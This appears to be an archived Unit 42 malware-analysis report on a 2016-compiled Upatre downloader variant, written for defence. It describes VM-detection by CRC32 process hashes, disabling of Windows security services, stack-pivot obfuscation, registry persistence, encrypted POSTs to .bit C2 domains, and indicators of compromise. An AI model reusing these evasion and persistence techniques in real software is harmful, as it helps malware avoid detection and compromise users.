{
	"id": "9e4e2fbb-894e-4e08-9bff-b7a6504f24f4",
	"created_at": "2026-04-06T00:11:53.538455Z",
	"updated_at": "2026-04-10T03:20:38.581597Z",
	"deleted_at": null,
	"sha1_hash": "55351d7aa674d176ad0bfddd737007d177d32550",
	"title": "Upatre Continued to Evolve with new Anti-Analysis Techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2589458,
	"plain_text": "Upatre Continued to Evolve with new Anti-Analysis Techniques\r\nBy Mike Harbison, Brittany Barbehenn\r\nPublished: 2018-07-13 · Archived: 2026-04-05 12:39:39 UTC\r\nFirst discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto\r\nthe victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000\r\nUpatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization\r\nthought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering\r\nDyre dropped dramatically, to less than 600 per month by January 2016.\r\nToday, the Upatre downloader tool is effectively no longer in use by criminal organizations. However, one of the\r\nmany interesting aspects of the Upatre tool had always been its constant adaptive nature where the developers\r\ncontinuously added features and capabilities to the tool to increase its efficacy.\r\nIn March 2018, Unit 42 researchers collected a sample of Upatre which was compiled in December 2016 but at\r\nthe time was largely undetectable by most automated detection systems . Because of this, we analyzed the sample\r\nto afford awareness to those interested in this malware and its evolution. This previously undocumented variant\r\nfeatures significant code flow obscuration, a pro re nata means of decryption for network communications, and of\r\nparticular interest, the method in which this variant evades virtual machine detection.\r\nIn this post we highlight these techniques identified during our analysis.\r\n  Malware Overview\r\nUpatre is a stage-0 malware, which basically means it’s a downloader.   The malware is used to download and\r\ninstall a payload onto the affected system.  The payload is retrieved from hardcoded domain(s) and is typically\r\nanother piece of malware. Historically, Upatre has acted as a downloader for malware families such as Dyre,\r\nGameOver Zeus, Kegotip, Locky, and Dridex to name a few. However, in this case no payload was delivered.\r\nAdditionally, variants such as this one collect information from the target and transmit the data via an HTTP\r\nPOST request.\r\nThis newly observed variant comes packed with several characteristics and capabilities that stood out to us during\r\nanalysis.  Attributes in the PE header suggest that the malware is written in Visual C++ and several of the PE\r\nsections have high entropy classification, which indicates that the binary is packed.  The PE resource section also\r\ncontains images of Google Chrome, so when the binary is placed on the target machine, it appears to be that of the\r\nGoogle Chrome web browser.\r\nOne of the key features about this variant that stood out during our analysis is how it detects whether or not it is\r\nrunning within a virtual machine. Although virtual machine detection is anything but new, in this variant, it is\r\nhandled a bit differently than other samples previously analyzed by Unit 42.  To, evade detection, the newly\r\nobserved variant enumerates the running processes on the host, generates a CRC32 hash of the process name,\r\nperforms an XOR with a hard-coded key of 0x0F27DC411, and finally compares the newly computed value\r\nagainst a list of values stored in an array within the code.  We observed the following values:\r\n0x6BA08023 0xDFF859A5 0x9649C9DF 0x91B88065 0xF663B61C\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 1 of 9\n\n0xC6E1589A 0xC63B2FDF 0xA9D475EF 0xCE9F7AE2 0xCF3B343A\r\n0x85D3D4E6 0x1392D4C 0xDFC3A97E 0x51ACC655 0xEF0F2980\r\n0x64EEAFAF 0xD5F11B49 0xC9823C94 0x9F4EE7C8 0x403C2A93\r\n0x6A50A975 0xECCCD158 0xED3CF80E 0x209202D5 0x2C6668C3\r\n \r\nThis version of Upatre will not transmit any data via HTTP POST to any of the target domains if one of these\r\nvalues is found.\r\nIn the event one of the values are found, the malware will sleep for six seconds and then will restart the entire\r\ncheck again.\r\nWe were unable to determine every corresponding process name from the CRC32 list above, however, we were\r\nable to decipher the following process names:\r\nProcess Name CRC32\r\nvmtoolsd.exe 0xD5F11B49\r\nvmacthlp.exe 0x403C2A93\r\nPython.exe 0x209202D5\r\n \r\nOther notable functionality of this new version of the Upatre malware includes:\r\nIn-memory loading of code\r\nDisables the following Windows services:\r\nWindows Security Center\r\nInternet Connection Sharing\r\nWindows Firewall\r\nWindows Defender\r\nWindows Update\r\nWindows Defender Network Inspection Service\r\nDisables Windows security notification balloons on Windows 7 and up\r\nDisables Internet Explorer Phishing Filter\r\nDisables Windows User Access Control Notifications\r\nLaunches a trusted Windows application msiexec.exe and injects code into its memory space using an\r\nundocumented technique\r\nHeavy use of obfuscated and optimized code to thwart code analysis\r\nUse of non-essential Windows API's for stack pivoting to mask intended API\r\nMultiple layers of custom encoding used for individual strings decoding. Does not share encoding routine\r\nwith other encoded values\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 2 of 9\n\nNetwork Communication\r\nAnother feature of this sample is the use of top level domains (TLD) of. bit. The intended domains are encrypted\r\nand only decrypted when the malware is ready to use them. This new sample attempts to resolve two domains,\r\nbookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers:\r\n31.3.135[.]232\r\n193.183.98[.]154\r\n5.135.183[.]146\r\n84.201.32[.]108\r\n185.133.72[.]100\r\n96.90.175[.]167\r\n104.238.186[.]189\r\nDNS resolution for .bit domains use hardcoded DNS servers and is handled via TCP versus traditional UDP. This\r\nis because .bit domains are based on Namecoin and aren’t regulated by ICANN. Additionally, the hardcoded DNS\r\nserver IPs we identified in this sample are all associated with OpenNIC Public DNS servers.\r\nAccording to OpenNIC, when using OpenNIC DNS servers .bit domains are resolved through centralized servers\r\nthat generate a DNS zone from the Namecoin blockchain; therefore, the secure nature of using Namecoin as a\r\ndecentralized means of DNS is not actually being utilized here.\r\nIf domain resolution is successful, the malware will then perform an HTTP POST request similar to the following:\r\nPOST / HTTP/1.0\r\nHost: bookreader[.]bit\r\nContent-Length: 1024\r\nÞm    á9,9r.@¿æ[.\"    Š?.àì..Cl„8f·Ö'LsÃøPi;±›hÏÀ¨*-2IóÙ4²R–k\"à{..rè!..~5¹qr^.¡h•âÔ?ý.ˆ¬–À$.Ÿ?óa..r(ì\r\nÑÖ¹Û.Î.·‹ÅE.ûÉn¯\u0026{qûÿ´©Ø.öî\",.YÒ!p†³3jÓ_sÐ.Páu»..KŠ†ÐïwÂ:š.¦Ú÷€âC\r\nnaH¾Û.½†¸q.TJ7.¾šB' ?.®îîGHxãGd\\¦jæµ.jGæûsðá].8®.Ï.X#8ç.Ô\u003c¹6ߎÄ..ù..\r\n€¬«ˆ@æ_t.,á.‡q.Ô¤.'³åÿW·äZ.ìa:©\"ïIãÌ.¤ô~œ    ïÒ§vBå|Ù«Ìfa.„{7Œìt.˜l_.ŒKNEÏg'¸O‹¯IWy.²«•    Ú…\r\n•j'Û'Š.b.t‡|Å..Œn†´ÕK¨‰»%ðfh    Eºw*¤šf‰Ò2š'¥V..qZÖ(«86ç\r\n˜W©g†ÕËÖ™.\"Í.Õüþs8Ts½.=Ö\\ókÌäE¨Ë†\u003e¡¾ü\\±ˆbÂï\u003e;9.Ã'ØœZuá©:=ÇTx˜ufýÉg.÷.Šâ‐\r\n\u003e.Èq.Ó9wnÖ.Ö[aöÝÇé1.Ÿ†HÁè–¡\u003eEhÂÙ.9©!©t .\"`éh.™^).ž½C.,º3õnØÑÙéîN0`-°\r\n[1×ß(J.ÃwXô`¥Ø÷²';B1/¤¤+wTg›¾Qf-ß.ÿ\"|fßX.,ãAÝêâºøbËe¾8X.0‡h…i9ÊŸF÷~GÞ=..Œþj'\u003eŽ.°øô.\"U„\r\nÖóÙæ¯'s.O/oŒØã‰sœàá‡.Ø2ú{Œ»êt»§hé±.Z#r.é.\u003cýj®½Ü¡\\(.….%ñŽËj..œ.¶‐\r\nDì\"®Ñ2xf4+ÀŒÖföUv•ê\\.äÓó¢Íéô¥.    „¦©V…–3×.Y.ŒÔm8ò@†.~b«Ñ—..JW/éé.eE.Ó.¬†\r\n89.E(=áø\"¿.\u003eø»¾åêŠ.¬2©Áä¬xýËù\u003cš.Ð.;éàE‰+\u0026xAEç\u003e\"@LpßÇ¢7ãÔÞ@‐\r\n~Âfß+Z±*òF=aWÂÖµÐe_ëƧë\u0026`|.\u003eVøÂá.C7ñ‚¯iÚ.µ.´)!Ϫ.ÇyO[‹¾?Js¨e\r\njKß±¯Z].613ŒÐ.|XÝõÿÊý;nU0Mw‚M»«½:Û?/\r\næ.$)¶ì_X.p.q.8.Ÿj€¬.œàï..B·âoŽM.êÅb¥8aÕù©s$ÏmhT£»¤/wwÆ6\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 3 of 9\n\ny=€ƒÖG™Úu yÍƲ\".® !BùìâÃ.=¦6\u003c)º\r\n5M´yótI\\\r\nNote, the HTTP POST does not contain any User-Agent strings.\r\nAt this time, we don’t fully understand the encryption method; however, we know that the data sent in the POST\r\nrequest is encrypted using a custom encryption algorithm.  Below is an example of data captured prior to\r\nencryption:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n00000000   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................\r\n00000010   00 00 00 00 60 00 00 00  00 00 00 00 01 00 00 00   ....`...........\r\n00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................\r\n00000030   11 27 00 00 00 00 00 00  20 00 00 00 20 00 00 00   .'...... ... ...\r\n00000040   57 49 4E 2D 52 49 38 38  4C 38 56 4D 45 38 4D 5F   WIN-RI88L8VME8M_\r\n00000050   45 35 33 32 36 34 38 41  37 36 31 46 34 43 35 41   E532648A761F4C5A\r\n00000060   AB AB AB AB AB AB AB AB  00 00 00 00 00 00 00 00   ««««««««........\r\n00000070   8B BB 9F 39 09 63 00 00  30 28 31 00 08 21 31 00   ‹»Ÿ9.c..0(1..!1.\r\n00000080   EE FE EE FE EE FE EE FE  EE FE EE FE EE FE EE FE   îþîþîþîþîþîþîþîþ\r\n00000090   EE FE EE FE EE FE EE FE  EE FE EE FE EE FE EE FE   îþîþîþîþîþîþîþîþ\r\n000000A0   9F BB 9C 2E 00 63 00 18  70 1B 31 00 60 21 31 00   Ÿ»œ..c..p.1.`!1.\r\n000000B0   78 1B 31 00 68 21 31 00  70 21 31 00 80 CF 2B 00   x.1.h!1.p!1.€Ï+.\r\n000000C0   00 00 1D 74 8D 12 1D 74  00 70 00 00 3C 00 3E 00   ...t...t.p..\u003c.\u003e.\r\n000000D0   38 20 31 00 14 00 16 00  60 20 31 00 04 40 0C 00   8 1.....` 1..@..\r\n000000E0   01 00 00 00 B0 A6 BA 77  BC 38 28 00 43 DB 5B 4A   ....°¦ºw¼8(.CÛ[J\r\n000000F0   00 00 00 00 00 00 00 00  F8 1F 31 00 F8 1F 31 00   ........ø.1.ø.1.\r\n00000100   00 20 31 00 00 20 31 00  38 23 31 00 90 20 31 00   . 1.. 1.8#1.. 1.\r\n00000110   54 05 B4 77 00 00 D9 3F  D5 8A 48 B8 82 D1 D3 01   T.´w..Ù?ÕŠH¸‚ÑÓ.\r\n00000120   AB AB AB AB AB AB AB AB  00 00 00 00 00 00 00 00   ««««««««........\r\n00000130   86 BB 9C 37 14 63 00 1A  43 00 3A 00 5C 00 57 00   †»œ7.c..C.:.\\.W.\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 4 of 9\n\n21\r\n22\r\n23\r\n00000140   69 00 6E 00 64 00 6F 00  77 00 73 00 5C 00 73 00   i.n.d.o.w.s.\\.s.\r\n00000150   79 00 73 00 74 00 65 00  6D 00 33 00 32 00 5C 00   y.s.t.e.m.3.2.\\.\r\n00000160   57 00 49 00 4E 00 4E 00  53 00 49 00 2E 00 44 00   W.I.N.N.S.I...D.\r\n \r\nObscuring Code Flow\r\nThis version of Upatre contains significantly obfuscated code to increase the difficulty of analysis.  Figure 1 below\r\nshows an example API call disassembled in IDA Pro.\r\n \r\n \r\nFigure 1-IDA Disassembly of API call\r\nFor conventional naming, the function at address 0x00137ED6 has been renamed to the Windows API \r\nRegQueryValueEx_0.  According to MSDN this function takes six parameters, the frame pointer is ESP based and\r\nthe stack frame would resemble the following:\r\n \r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 5 of 9\n\nFigure 2-Inside Func_RegQueryvalueEx_0\r\n \r\nIn the above figure, Func_RegQueryValueEx_0 is EBP based and performs the following:\r\nSaves the current stack pointer in EBP\r\nThe stack pointer is adjusted 268 bytes (thwarting stack frame analysis)\r\nPushes a pointer, which points to the REGKEY string\r\nAfter the call into sub_140CBE the stack would resemble the following:\r\nFigure 3--Inside Sub_140CBE\r\n \r\nFunction Sub_140CBE does the following:\r\nPushes 0x13 on the stack\r\nCalls another function, which ends up jumping into the Windows API GetSystemMetrics\r\n0x13 is the SM_CSURSOR index used by GetSystemMetrics, which returns the width of a cursor in pixels. \r\nRetrieving this value has no bearing on the program as the return value is not used.\r\nHow the stack looks after the call to func_GetSytemMetrics\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 6 of 9\n\nFigure 4--Inside Func_GetSystemMetrics\r\n \r\nSome interesting observations about this function:\r\nThe JMP instruction is used versus the CALL instruction as JMP doesn’t affect the stack.\r\nThe two PUSH instructions are junk values and only used to pivot the stack, so the correct return address is\r\non the stack during the return.\r\nHere is how the stack looks prior to the jump:\r\n \r\nReturn address 0x001414FD is the address that is used to open and query the hosts registry, and this is the target\r\naddress after executing the above instructions.  The return code flow is as follows:\r\n1. The two junk data values pushed on the stack are cleared during the executing of the GetSystemMetrics\r\nAPI.\r\n2. The stack pointer is incremented past 0x13\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 7 of 9\n\n3. Address 0x00140CC5 has a retn instruction\r\n4. Address 0x001414FD is now on the top of the stack and the section within the malware that handles\r\nWindows registry enumeration is called (RegQueryValueEx).\r\nThis stack pivot is performed entirely to make static analysis of the file more difficult, but the end result is still\r\nthat the API function executes, and the malware accomplishes its task.\r\n  Persistence Technique\r\nTo establish persistence, this new version of Upatre creates the following registry key:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\\r\nString value--\u003ex$msbuild where x$ is a random alpha character. Note: the name of the binary depends on\r\nthe executable that is running.  The stub program grabs the Windows name of the EXE and prepends it with\r\na random value. \r\nData --\u003eC:\\ProgramData\\MSBuild\\x$exe\r\nFile x$MSBuild.exe is then copied to the host's C:\\ProgramData\\MSBuild folder.\r\n \r\nConclusion\r\nIn our data, we have observed over 119,000 unique malware samples that use dot-bit (.bit) domains for C2\r\ninfrastructure as early as 2014.  Malware families observed include Necurs, GandCrab, Vobfus, Tofsee, Floxif,\r\nRamnit, and several others.\r\nDue to the C2 domains being down at the time of our analysis, which was unsurprising given the potential age of\r\nthe sample, we were never able to capture the ultimate payload for this new Upatre variant.  However, open source\r\nanalysis on this variant identified another sample configured with the same dot-bit domains.  The sample,\r\n94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83, was compiled six days after our\r\nUpatre sample and delivered the Chthonic banking trojan via RIG exploit kit.\r\nAlthough the delivery mechanism was not observed during our analysis, Upatre typically arrives via an email\r\nlink/attachment or through a compromised website.\r\n  Defending Against this Threat\r\nThe Upatre malware is constantly changing and is capable of downloading many different malware families,\r\nsome, destructive.  Using threat detection and prevention solutions such as the Palo Alto Networks next-generation security platform are highly recommended as part of a proactive cyber security strategy. WildFire and\r\nTraps both detect the samples described in this report as malicious.\r\nNot all dot-bit domains are malicious, but organizations should take steps to ensure they can control access to all\r\npotentially malicious domains. Blocking outbound access to DNS servers and re-routing DNS requests to\r\ninternally controlled DNS servers can help protect a network from malware using dot-bit domains provided by the\r\nNamecoin network.\r\nPalo Alto Networks customers remain protected from Upatre and can identify this threat using the Upatre tag in\r\nAutoFocus.\r\nIndicators of compromise associated with this analysis include:\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 8 of 9\n\nUpatre\r\nSHA256:   8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4\r\nCthonic\r\nSHA256:   94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83\r\nC2s\r\nDomain:   doghunter[.]bit\r\nDomain:   bookreader[.]bit\r\nIP Address:  31.3.135[.]232\r\nIP Address:  193.183.98[.]154\r\nIP Address:  5.135.183[.]146\r\nIP Address:  84.201.32[.]108\r\nIP Address:  185.133.72[.]100\r\nIP Address:  96.90.175[.]167\r\nIP Address:  104.238.186[.]189\r\n  Updated on 7/13/2018 to clarify that the Upatre sample discussed was compiled in 2016 but is newly discovered\r\nin 2018 and to more clearly identify samples with their hashes.\r\nSource: https://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/"
	],
	"report_names": [
		"unit42-upatre-continues-evolve-new-anti-analysis-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434313,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.pdf",
		"text": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.txt",
		"img": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.jpg"
	}
}